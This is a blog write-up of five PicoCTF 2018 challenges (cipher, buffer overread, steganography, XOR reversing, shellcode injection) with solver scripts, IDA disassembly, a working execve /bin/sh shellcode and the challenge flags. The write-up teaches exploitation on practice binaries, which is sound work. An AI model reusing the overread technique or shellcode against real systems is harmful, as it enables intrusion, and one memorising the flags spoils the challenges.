PicoCTF 2018, part 41 through 45

Introduction

This is a continuation of the series on the PicoCTF 2018 challenges I have completed so far. You can find the previous write-up here. You can find a collection of other write-ups in this series on the home page or through the related posts below this post. The challenges are getting elaborate and fun, we're going to do 5 write-ups per post...

Hertz 2200 points

This challenge gives you another slice of text through a nc connection you need to decipher.

This flag has been encrypted with some kind of cipher, can you decrypt it? Connect with nc 2018shell.picoctf.com 12521.

When you connect to the server using net cat you are greeted by a small chunk of encoded text. Immediately you can recognize the format of the flag in there as well, so that might give us some hints on the cipher. Here's the enciphered text:

Pqd ryfag owenj vet lyimb eudw pqd khzx ces. F ahj'p odkfdud pqfb fb byaq hj dhbx mweokdi fj Mfae. Fp'b hkiebp hb fv F bekudc h mweokdi hkwdhcx! Eghx, vfjd. Qdwd'b pqd vkhs: mfaeAPV{byobpfpypfej_afmqdwb_hwd_pee_dhbx_qqqqfkpmpp}

You could say that ['m', 'f', 'a', 'e', 'A', 'P', 'V'] = ['p', 'i', 'c', 'o', 'C', 'T', 'F']. This might help any brute-force tool / attack tool we use to find a solution sooner. I decided to use quipqiup for this and used mfaeAPV=picoCTF for the Clues field. This results in the following output:

The ?uic? bro?n fo? ?umps over the la?y do?. I can't believe this is such an easy problem in Pico. It's almost as if I solved a problem already! O?ay, fine. Here's the fla?: picoCTF{substitution_ciphers_are_too_easy_hhhhiltptt}

Even though we now have the flag, we can still expand the Clues field for quipqiup with characters we deduce from the deciphered text: + rgntlzs=qkwxjzg = mfaeAPVrgntlzs=picoCTFqkwxjzg. With these updated clues, we get the full deciphered text:

The quick brown fox jumps over the lazy dog. I can't believe this is such an easy problem in Pico. It's almost as if I solved a problem already! Okay, fine. Here's the flag: picoCTF{substitution_ciphers_are_too_easy_hhhhiltptt}

flag: picoCTF{substitution_ciphers_are_too_easy_hhhhiltptt}

Leak Me200 points

This challenge wants to authenticate to a service running remotely and get the flag. The title implies we need to leak data somehow.

Can you authenticate to this service and get the flag? Connect with nc 2018shell.picoctf.com 23685. Source.

I first decided to connect to the service and see what the application wants from us. When you connect to the above service, you'll see that the application is the shell you connect to. The next is the input/output from a session:

What is your name?
> xoru
Hello xoru,
Please Enter the Password.
> MyAmazingPassword
Incorrect Password!

This is good news, there's some input the application expects from me, so there might be an exploit there somewhere. I think it's time to look at the source code and see what we can do. I'll list the full C source code here, so that I can refer to certain lines in code.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

int flag() {
  char flag[48];
  FILE *file;
  file = fopen("flag.txt", "r");
  if (file == NULL) {
    printf("Flag File is Missing. Problem is Misconfigured, .....\n");
    exit(0);
  }

  fgets(flag, sizeof(flag), file);
  printf("%s", flag);
  return 0;
}


int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  // Set the gid to the effective gid
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  // real pw: 
  FILE *file;
  char password[64];
  char name[256];
  char password_input[64];

  memset(password, 0, sizeof(password));
  memset(name, 0, sizeof(name));
  memset(password_input, 0, sizeof(password_input));

  printf("What is your name?\n");

  fgets(name, sizeof(name), stdin);
  char *end = strchr(name, '\n');
  if (end != NULL) {
    *end = '\x00';
  }

  strcat(name, ",\nPlease Enter the Password.");

  file = fopen("password.txt", "r");
  if (file == NULL) {
    printf("Password File is Missing. Problem is Misconfigured, ....\n");
    exit(0);
  }

  fgets(password, sizeof(password), file);

  printf("Hello ");
  puts(name);

  fgets(password_input, sizeof(password_input), stdin);
  password_input[sizeof(password_input)] = '\x00';

  if (!strcmp(password_input, password)) {
    flag();
  }
  else {
    printf("Incorrect Password!\n");
  }
  return 0;
}

The first thing I can notice is that three buffers are placed on the stack: password[64], name[256], password_input[64] - this is something that has to be remembered, as there might be an exploit somehow here. When you disassemble the code and look at it in IDA you'll see that the password[64] buffer comes right after the name[256] buffer.

password_input_buff = byte ptr -194h
name_buff           = byte ptr -154h
password_buff       = byte ptr -54h  ; password_buff comes after name_buff in memory

If you can somehow get to the password_buf you might be able to read (leak) the password data that is read from the password.txt file. The next slice of code might be just what I needed for that:

  printf("What is your name?\n");

  fgets(name, sizeof(name), stdin);
  char *end = strchr(name, '\n');
  if (end != NULL) {
    *end = '\x00';
  }

  strcat(name, ",\nPlease Enter the Password.");

At first the program reads the name from stdin to the name[256] buffer. It reads a fixed amount of data, specifically the size of the name buffer, thus 256 bytes max. It also ensures that the string ends with a NUL-byte, something we need to get out of the way.

After that, for some reason, the program concatenates ",\nPlease Enter the Password." to the name buffer. This is where the exploit lives. strchar adds the specified string at the end of the target string name. This means that it continues at the position of the last NUL-char.

If you were to write a name of 256 bytes, you'll completely fill the name buffer. The program then concatenates the password prompt to that name and removes the NUL-byte: it writes into the passwordbuffer. This is enormously useful, considering the name string now ends in the password buffer.

After this ordeal the program will read the password from password.txt into password[64] and when that is completed, it will print Hello <name> - however the name buffer now ends in the password buffer because it has no NUL-byte anymore - we will see our entered name of 256 bytes and the password instead of just the name!

You can quickly test this with this one-liner:

python3 -c "print('A'*256)" | nc 2018shell.picoctf.com 23685
# What is your name?
# Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,a_reAllY_s3cuRe_p4s$word_a28d9d
# Incorrect Password!

We could stop here, copy the password and run the nc 2018shell.picoctf.com 23685 command to enter a username and this valid password to get the flag, but we could also automate this with a nice python script.

from sys        import argv
from contextlib import contextmanager
import socket

# Receive data until a certain message is found
def recv_until(socket, message):
    data = ""

    while (data.find(message) == -1):
        data += str(socket.recv(32), "utf-8")

# I like to be able to write with sock(...) as s
@contextmanager
def sock(*args, **kw):
    s = socket.socket(*args, **kw)
    try:
        yield s
    finally:
        s.close()

# length to fill the name buffer with
length = 256

# We'll connect directly to the shell and send our exploit data
HOST = "2018shell.picoctf.com"
PORT = 23685

password = ""

# Determine password by completely filling the name buffer, removing NUL (leak)
with sock(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    recv_until(s, "What is your name?\n")
    s.send(b"A" * length + b"\n")               # send the 'name'
    data = repr(s.recv(1024))                   # receive the name+password

    # split the returned data to isolate the password
    start_of_password = data[(data.find("Hello ") + 6 + length):]
    password          = start_of_password[:start_of_password.find("\\n")]
    print("password found: {:s}".format(password))

# Now knowing the password, send the proper auth request
with sock(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))

    recv_until(s, "What is your name?\n")
    s.send(b"AAAA\n")                           # bogus username, nobody cares

    recv_until(s, "Please Enter the Password.\n")
    s.send(bytes(password, "utf-8") + b"\n")    # send the extracted password

    data = str(s.recv(1024), "utf-8")           # receive the flag!
    print("flag found:     {:s}".format(data))

python3 solution.py
# password found: a_reAllY_s3cuRe_p4s$word_a28d9d
# flag found:     picoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_ee6111c9}

flag: picoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_ee6111c9}

Now You Don't200 points

This challenge provides us with another image that contains some data, somewhere.

We heard that there is something hidden in this picture. Can you find it?

I didn't figure it would be as easy as simply running strings or exiftool on the file, however that's usually what I do first with problems related to images. These commands yielded nothing useful though, so I continued to the next step in my checklist when dealing with images.

I have a couple of tools I use to see if an image contains data using steganography. The first tool, steghide, did not give me anything useful. I ran the command steghide extract -sf nowYouDont.png:

steghide: the file format of the file "nowYouDont.png" is not supported.

I didn't want to give up checking out steganography quite yet and luckily, there is an amazing website that helps us figure out if data (or an image) is hidden in another image. This amazing tool processed this image in no-time at all and gave me a nice black-and-white image of the flag. This gave me the idea that the shades of one of the colors is different than the surrounding colors, resulting in a 1-bit greyscale image:

Decoded using online tool

Now this was obviously not enough for me, as I wanted to automate this process using Python. There is an amazing library (a fork of the original library named PIL) called Pillow in Python that allows you to process images. This library also allows you to access pixel data through imageInstance.load(), which returns a matrix of color tupels. This allowed me to identify which channel contained the hidden image and extract it nicely.

from PIL import Image

class LeastSignificantRgbPixelBitCollector:
    'Collect all least significant bits in a 32-bit image'

    def __init__(self, image):
        self.image  = image
        self.data   = image.load()
        self.width  = image.width
        self.height = image.height

    # I could have collected all three channels as image in one go, however I
    # wanted code clarity more than performance in this case. It's fast enough
    def collect_channel_image(self, channel, background, foreground, invert = False):
        image  = Image.new('RGB', (self.width, self.height), "black")
        buffer = image.load()
        colors = (background, foreground)

        if (invert):
            colors = (foreground, background)

        for y in range(0, self.height):
            for x in range(0, self.width):
                # If bit 0 is set, the foreground color is used. If bit 0 is not
                # set, the background color is used. & 1 results in either 0 or 1
                # which is a nice index for our colors tupel
                buffer[x,y] = colors[(self.data[x,y][channel] & 1)]

        return image

    # Collect the least significant bit of the red channel as new image
    def collect_red_image(self, background, foreground, invert = False):
        return self.collect_channel_image(0, background, foreground, invert)

    # Collect the least significant bit of the green channel as new image
    def collect_green_image(self, background, foreground, invert = False):
        return self.collect_channel_image(1, background, foreground, invert)

    # Collect the least significant bit of the blue channel as new image
    def collect_blue_image(self, background, foreground, invert = False):
        return self.collect_channel_image(2, background, foreground, invert)

# Open the original image
with Image.open("nowYouDont.png") as image:
    lsb_collector = LeastSignificantRgbPixelBitCollector(image)
    print("Image loaded, {:d}px x {:d}px".format(lsb_collector.width, lsb_collector.height))

    # Define the channels we want to extract: (channel_index, output_filename, background_color, foreground_color)
    channels = [
        (0, "red_lsb.png",   (40, 0, 0), (220, 0, 0)), 
        (1, "green_lsb.png", (0, 40, 0), (0, 220, 0)), 
        (2, "blue_lsb.png",  (0, 0, 40), (0, 0, 220))
    ]

    # Extract each channel and save it
    for c in channels:
        lsb_collector.collect_channel_image(c[0], c[2], c[3], True).save(c[1])
        print(" - Channel {:d} saved as {:s}".format(c[0], c[1]))

When you run this code and look at the source directory, you'll see the three images. The green_lsb.png and blue_lsb.png files are just green and blue respectively. The red_lsb.png image however contains the flag in text on a dark red background, just like we defined.

Decoded using Python

flag: picoCTF{n0w_y0u_533_m3}

Quackme200 points

This challenge gives us another reversing problem, I need to get a flag from a program. I love these challenges!

Can you deal with the Duck Web? Get us the flag from this program. You can also find the program in /problems/quackme_3_9a15a74731538ce2076cd6590cf9e6ca.

This is an interesting program, as it took me a little longer compared to other challenges to solve this. Not because finding the answer took me the longest, but completely understanding the assembly code had me a bit baffled for some reason. I think it is because I simply didn't get why some operations were done in so "many" steps. For example, a buffer is allocated using malloc but the pointer is never used again. This is exactly what people might do to try to confuse you!

When you run the program at the specified path you get the next prompt:

You have now entered the Duck Web, and you're in for a honkin' good time. Can you figure out my trick?

You can enter any amount of text, however it does not matter what you enter (it seems). The program will simply say goodbye with a nice message and exit when you press return:

That's all folks.

I think it is time to reverse this binary in IDA. I took the liberty to label every single one of my findings in the binary ahead, so I can explain it better in this writeup. Let's have a look at the int main(...) function first. That function is not too special to me considering this challenge.

; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near ; DATA XREF: _start+17↑o

var_4 = dword ptr -4
argc  = dword ptr  8
argv  = dword ptr  0Ch
envp  = dword ptr  10h

lea     ecx, [esp+4]
and     esp, 0FFFFFFF0h
push    dword ptr [ecx-4]
push    ebp
mov     ebp, esp
push    ecx
sub     esp, 4
mov     eax, ds:stdout@@GLIBC_2_0
push    0
push    2
push    0
push    eax
call    _setvbuf
add     esp, 10h
sub     esp, 0Ch
push    offset aYouHaveNowEnte ; "You have now entered the Duck Web, and "...
call    _puts
add     esp, 10h
call    do_magic ; Interesting!
sub     esp, 0Ch
push    offset aThatSAllFolks ; "That's all folks."
call    _puts
add     esp, 10h
mov     eax, 0
mov     ecx, [ebp+var_4]
leave
lea     esp, [ecx-4]
retn
main            endp

As you can see, main simply initializes stdout, prints a message "You ave now entered....", calls do_magic, prints another message "That's all folks." and then finalizes the program and exits. The only interesting instruction here is the call do_magic which we'll investigate next.

public do_magic
do_magic proc near ; CODE XREF: main+35↓p

xored_byte            = byte  ptr -1Dh
verified_bytes_count  = dword ptr -1Ch
for_loop_index        = dword ptr -18h
entered_input         = dword ptr -14h
entered_input_length  = dword ptr -10h
buffer_dummy?         = dword ptr -0Ch

push    ebp
mov     ebp, esp
sub     esp, 28h
call    read_input                        ; Just reading user input from stdin, safe
mov     [ebp+entered_input], eax          ; Store input in local variable
sub     esp, 0Ch
push    [ebp+entered_input]
call    _strlen                           ; strlen(entered_input)
add     esp, 10h
mov     [ebp+entered_input_length], eax   ; result from strlen stored in local variable
mov     eax, [ebp+entered_input_length]
add     eax, 1                            ; entered_input_length + 1 in eax
sub     esp, 0Ch
push    eax
call    _malloc                           ; malloc(eax)
add     esp, 10h
mov     [ebp+buffer_dummy?], eax          ; store result of malloc in variable
cmp     [ebp+buffer_dummy?], 0            ; ensure memory was allocated
jnz     short loop_initializer            ; jump to loop initializer on success

; When memory allocation failed, an error is printed and the program exits
sub     esp, 0Ch
push    offset aMallocReturned ; "malloc() returned NULL. Out of Memory\n"
call    _puts
add     esp, 10h
sub     esp, 0Ch
push    0FFFFFFFFh
call    _exit

The first part of the do_magic function doesn't do much magic. It reads a string of input from stdin via the read_input function and stores that value in entered_input and its length in entered_input_length by determining the length with strlen.

It then allocates entered_input_length + 1 bytes of memory using malloc and stores the result of the call to malloc in what I called buffer_dummy?. I couldn't determine where this memory was used (or freed). I'm guessing it is used to confuse you and for a little while, it did me. I simply couldn't find any other references to buffer_dummy? aside from the ones used in initialization (we'll see one more part of that later), so I disregarded them.

As a matter of fact, the buffer returned by read_input is also never freed (and it should). Memory leaks everywhere!

If the memory allocation of the dummy buffer failed, the program displays an error message and exits. If it did not fail, jnz_loop_initializer jumps over that error and moves the instruction pointer to the interesting part of this function - let's have a look at that now.

; This seems like a typical for(int i = 0; i < input_length; i += 1) { ... }
loop_initializer:
  mov     eax, [ebp+entered_input_length]
  add     eax, 1                            ; entered_input_length + 1 in eax
  sub     esp, 4
  push    eax
  push    0
  push    [ebp+buffer_dummy?]               ; memset(buffer_dummy?, 0, entered_input_length + 1 (eax))
  call    _memset
  add     esp, 10h
  mov     [ebp+verified_bytes_count], 0     ; int verified_bytes_count = 0
  mov     [ebp+for_loop_index], 0           ; int for_loop_index = 0
  jmp     short for_loop_condition          ; jump to loop condition
; ---------------------------------------------------------------------------

for_loop_body:
  mov     eax, [ebp+for_loop_index]         ; get current i
  add     eax, 8048858h                     ; add address to xor key
  movzx   ecx, byte ptr [eax]               ; read 1 byte of key to ecx
  mov     edx, [ebp+for_loop_index]         ; get current i
  mov     eax, [ebp+entered_input]          ; get address to entered_input
  add     eax, edx                          ; add address and current i
  movzx   eax, byte ptr [eax]               ; read 1 byte of input to eax
  xor     eax, ecx                          ; xor byte of key with byte of input
  mov     [ebp+xored_byte], al              ; store xor result in xored_byte
  mov     edx, greetingMessage              ; get address to greetingMessage
  mov     eax, [ebp+for_loop_index]         ; get current i
  add     eax, edx                          ; add address and current i
  movzx   eax, byte ptr [eax]               ; read 1 byte of greetingMessage to eax
  cmp     al, [ebp+xored_byte]              ; compare read byte with xored_byte
  jnz     short is_entered_data_valid       ; jump over verified_bytes_count + 1 if not equal
  add     [ebp+verified_bytes_count], 1     ; conditions met, verified_bytes_count + 1

; if statement
is_entered_data_valid:
  cmp     [ebp+verified_bytes_count], 19h   ; verified_bytes_count == 25?
  jnz     short for_loop_increment          ; no, jump to loop increment and continue
  sub     esp, 0Ch
  push    offset aYouAreWinner              ; yep, 25 valid bytes! We win!
  call    _puts
  add     esp, 10h
  jmp     short return_from_f               ; return from function
; ---------------------------------------------------------------------------

for_loop_increment:
  add [ebp+for_loop_index], 1               ; increment statement in for-loop

for_loop_condition:                         ; condition statement in for loop
  mov     eax, [ebp+for_loop_index]
  cmp     eax, [ebp+entered_input_length]
  jl      short for_loop_body               ; condition: (for_loop_index < entered_input_length)

; return
return_from_f:
  leave
  retn
do_magic endp

Now this big chunk of code is where the magic happens. This very typical for loop (which I labeled, but you can recognize them quite easily in assembly code) is responsible for applying xor to every byte of a "secret" key and the user input at the same offset. The result of this xor operation should be equal to a byte in the welcome message at that same offset. If that is the case, the byte will be counted in verified_bytes_count. In the for loop there is another if statement that checks if verified_bytes_count is equal to 25. If that is the case, all user input was correct and you win! See the comments in the assembly code for further explanation.

For clarity, here's my interpretation of the disassembled do_magic function in C/C++:

void do_magic() {
    const char *entered_input   = read_input(); // defined in challenge program, see IDA
    size_t entered_input_length = strlen(entered_input);
    const char *buffer_dummy    = malloc(entered_input_length + 1);

    // could not allocate memory
    if (!buffer_dummy) {
        puts("malloc() returned NULL. Out of Memory\n");
        exit(-1);
    }

    // clearing of the buffer nobody knows what it is for...
    memset(buffer_dummy, 0, entered_input_length);

    /*
        the interesting part, perform a xor operation on your input and the
        secret key at address 0x8048858 to see if it results in the greetingMessage
        greetingMessage:  'You have now entered the Duck Web, ...' (need 25 chars)
        key at 0x8048858: [
            0x29, 0x06, 0x16, 0x4F, 0x2B,
            0x35, 0x30, 0x1E, 0x51, 0x1B,
            0x5B, 0x14, 0x4B, 0x08, 0x5D,
            0x2B, 0x52, 0x17, 0x01, 0x57,
            0x16, 0x11, 0x5C, 0x07, 0x5D
        ]
    */

    /*
        The number of bytes that successfully xor to the welcome message.
    */
    int verified_bytes_count = 0;

    // The magic loop
    for (int for_loop_index = 0; for_loop_index < entered_input_length; for_loop_index += 1) {
        char xored_byte = entered_input[for_loop_index] ^ xor_key[for_loop_index];

        if (xored_byte == greetingMessage[for_loop_index])
            verified_bytes_count += 1;

        if (verified_bytes_count == 25) {
            puts("You are winner!");
            return;
        }
    }

    return;
}

Now getting the flag should be extremely easy knowing all of this. If user_input XOR secret_key results in the welcome message (at least 25 characters of it), you can say that welcome_message XOR secret_key will result in the desired user input to get the You are winner! message. I bet that this is the flag too!

Python can be used to do that for us:

# convert an array of bytes to a string
def str_from_bytes(bytes):
    return ''.join([chr(c) for c in bytes])

# xor every byte in string a to every byte in string b and produce a new string
def xor_str(a, b):
    return ''.join([chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(a, b)])


# The welcome message and the xor-key from the program deduced from the
# dissasembled program.
# Only the first 25 characters are needed from the original message:
# You have now entered the Duck Web, and you're in for a honkin' good time.
welcome_message = "You have now entered the Duck Web, ..."
decrypt_message = str_from_bytes([
    0x29, 0x06, 0x16, 0x4F, 0x2B,
    0x35, 0x30, 0x1E, 0x51, 0x1B,
    0x5B, 0x14, 0x4B, 0x08, 0x5D,
    0x2B, 0x52, 0x17, 0x01, 0x57,
    0x16, 0x11, 0x5C, 0x07, 0x5D
])

# welcome_message[:25] XOR decrypt_message = desired input (and flag)
print(xor_str(welcome_message[:len(decrypt_message)], decrypt_message))

Execute this code and get the flag:

python3 solution.py
# > picoCTF{qu4ckm3_7ed36e4b}

To verify that this is actually what we need, run it through the program as this is also the expected input:

./main
# Can you figure out my trick?
# picoCTF{qu4ckm3_7ed36e4b}
# You are winner!
# That's all folks.

Nice! That was fun!

flag: picoCTF{qu4ckm3_7ed36e4b}

Shellcode200 points

This challenge involves executing shell code in the provided program, which doesn't prove to be extremely complicated.

This program executes any input you give it. Can you get a shell? You can find the program in /problems/shellcode_4_99838609970da2f5f6cf39d6d9ed57cd on the shell server. Source.

This challenge I believe is an introduction to shellcode injection for people who have never done this before. Shellcode typically is a small piece of executable code that can be injected into a target program to obtain a shell that would otherwise not be available.

The specified remote path contains the vuln program, vuln.c source code (which can also be downloaded by clicking the link) and the flag.txt. The problem here is that we as a user don't have permission to read flag.txt, but the vuln program does.

The vuln program has the setgid bit set, meaning that it has the same permissions as the group of the vuln file no matter who executes vuln. It just so happens to be the group that is allowed to read flag.txt. The shellcode we inject should open a shell, that shell then has permission to read flag.txt.

ls -al
# -r--r-----   1 hacksports shellcode_4     34 Nov 15 02:22 flag.txt
# -rwxr-sr-x   1 hacksports shellcode_4 725408 Nov 15 02:22 vuln
# -rw-rw-r--   1 hacksports hacksports     562 Nov 15 02:22 vuln.c

Let's have a look at the included vuln.c source code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter a string!");
  vuln(buf);

  puts("Thanks! Executing now...");

  ((void (*)())buf)();

  return 0;
}

As you can see, the void vuln(char *buf) function simply reads the user input to a buffer that is 148 bytes large. It also echoes the input, so whatever you type is also written back to you. After that, the buffer is simply executed as a function returning void, taking no parameters.

This means that anything that is entered as input in this program will be executed by the program, no matter what it is. Any shell code with a maximum length of 148 bytes can be used here, but most shellcode for starting /bin/sh is much shorter than that.

On Linux (or Unix) there are special system calls you can do from your assembly code with the int 80h instruction. This mechanic gives us a huge amount of freedom with little space required. In a few bytes of assembly you can push the data /bin//sh onto the stack. Hence the double slash between bin and sh, this doesn't matter for sys_execve and it gives us a nice 8 byte long string. On 32-bit, that fits perfectly in 2 32-bit integers.

You can then copy the stack pointer esp to ebx, which is the parameter register for sys_execve - because esp points to the start of the data we just pushed (the path to /bin//sh). sys_execve will read the path until a NUL byte is encountered, hence the first push eax in the code below, that's the terminating NUL character.

After clearing ecx and edx the instruction int 80h is executed, which will in turn execute /bin//sh. The shell runs, you can do anything the program is allowed to do. After the shell exits, the assembly continues and invokes the sys_exit syscall, which will stop program execution and prevent a segmentation fault.

xor    eax,eax        ; eax = 0, terminating NUL
push   eax            ; push 0 to stack, end of path string 
push   0x68732f2f     ; push //sh to stack as 32 bit integer
push   0x6e69622f     ; push /bin to stack as 32 bit integer, /bin//sh\0 done!
mov    ebx,esp        ; move stack pointer to ebx, ebx is param for sys_execve!
mov    ecx,eax        ; ecx = 0 for sys_execve
mov    edx,eax        ; edx = 0 for sys_execve
mov    al,0xb         ; eax = 11 = sys_execve
int    0x80           ; syscall sys_execve with param in ebx (/bin//sh\0)
xor    eax,eax        ; eax = 0
inc    eax            ; eax = 1 = sys_exit
int    0x80           ; syscall sys_exit, clean exit to prevent segfault

Assembled it looks like this string in Python:

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

Or when used with echo -en in a shell, you can simply pipe this shellcode to the vuln program and redirect your i/o to it. We can do this on the remote shell server and get our flag!

(echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\n"; cat) | ./vuln
# Enter a string!
# 1�Ph//shh/bin�����°
#                    1�@̀
# Thanks! Executing now...
ls -al
# total 776
# drwxr-xr-x   2 root       root          4096 Nov 15 02:22 .
# drwxr-x--x 566 root       root         53248 Nov 15 04:28 ..
# -r--r-----   1 hacksports shellcode_4     34 Nov 15 02:22 flag.txt
# -rwxr-sr-x   1 hacksports shellcode_4 725408 Nov 15 02:22 vuln
# -rw-rw-r--   1 hacksports hacksports     562 Nov 15 02:22 vuln.c
cat flag.txt
# picoCTF{shellc0de_w00h00_b766002c}

flag: picoCTF{shellc0de_w00h00_b766002c}

PicoCTF 2018 Write-up for problems 41 through 45